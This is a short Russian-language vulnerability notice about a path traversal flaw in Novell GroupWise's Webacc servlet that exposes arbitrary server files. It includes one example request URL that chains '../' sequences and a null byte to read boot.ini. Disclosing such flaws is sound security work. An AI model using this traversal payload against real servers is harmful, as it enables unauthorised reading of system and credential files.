На сервере Novell GroupWise можно читать любые
файлы, компонента Webacc неправильно
обрабатывает пути и можно на сервере
прочитать любой файл.

Пример:

http://server:port/servlet/webacc?User.html=../../../../../../
../../boot.ini%00



Оставить мнение